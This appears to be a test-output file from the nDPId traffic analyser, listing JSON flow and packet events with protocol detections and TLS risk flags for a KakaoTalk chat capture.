00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1430069164839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069164839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLThEAAQAZ+OgoYUryLlgB9t2MBu1EoBIpiI9Y5UBiiGP3wAAAmAAAA7+nGaLVdqRc+Gkt7POZ3izYaHM4cfJ\/pKc5wznSY7XhZjDJkzsc="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164966,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069164966,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069140120,"flow_last_seen":1430069140120,"flow_idle_time":7560000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":1,"thread_ts_msec":1430069140120,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069140120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069140120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAHLza0AAPwZJVQoYUrxn9jn7x00fkMsN+RcrPwfugBgApZHwAAABAQgKAAs11Jj3Xso6AAAArVkC\/4gP\/deLY5qAl+gvk5f8xql5QXAwvM9bb5tQyHwtP1GibAaltsw94jGcvj4NNAB8Nc8SXCTCPg=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069140453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069140453,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADRbKkAALgby1Gf2OfsKGFK8H5DHTSs\/B+7LDflVgBAADqYIAAABAQgKmPgkmwALNdQ="}
00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1430069140501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":194,"pkt_l4_len":158,"thread_ts_msec":1430069140501,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAALJbK0AALgbyVWf2OfsKGFK8H5DHTSs\/B+7LDflVgBgADj7dAAABAQgKmPgkrAALNdR6AAAArVkC\/4gP\/deLY5qAl+gvk5f8hql5QTAwvM9Zf4dQyEAJD7QL56t1BA6CZFNB9CDoZPBzNcfqISYY4Bqx6IvbToog47dFxVed4MxS159GEgFcWpzNI6MS\/uDRtBTN\/KgQO5PWR5hOlzi0NPjPSZ5ZvXYRnArc8Dv9Cys="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141261,"flow_last_seen":1430069141261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069141261,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069141261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141261,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY+0AArAbF1ngcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069141403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141403,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjM1kAAPwZ\/FwoYUrx4HBryhuUAUHEB4UFlai7AUBA5CBlHAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1430069141433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141433,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY\/EAArAbF1XgcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141923,"flow_last_seen":1430069141923,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1430069141923,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069141923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":157,"pkt_l4_len":121,"thread_ts_msec":1430069141923,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAI3lSkAAPwYIYQoYUrw2\/7ns5iQUZtvqJ3tQl6xegBgAe+ktAAABAQgKAAs2irXIgpc8aXEgdG89J3hpYW9taS5jb20nIGlkPScwJyBjaGlkPScwJyB0eXBlPSdnZXQnPjxwaW5nIHhtbG5zPSd1cm46eG1wcDpwaW5nJz48L3Bpbmc+PC9pcT4NCg=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069142333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069142333,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTWOEAALQYpzDb\/uewKGFK8FGbmJFCXrF7b6ifUgBAAZ2sMAAABAQgKtcrV6gALNoo="}
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1430069142373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":103,"pkt_l4_len":67,"thread_ts_msec":1430069142373,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFfWOUAALQYpqDb\/uewKGFK8FGbmJFCXrF7b6ifUgBgAZ9bAAAABAQgKtcrV6gALNoo8aXEgY2hpZD0nMCcgaWQ9JzAnIHR5cGU9J3Jlc3VsdCcvPg=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069159456,"flow_last_seen":1430069159456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069159456,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069159456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159456,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvUAAPwaqhQoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOF5AAACBAV4BAIICgALPSMAAAAAAQMDBw=="}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069159814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159814,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvkAAPwaqhAoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOEVAAACBAV4BAIICgALPYcAAAAAAQMDBw=="}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="}
00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}}
01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
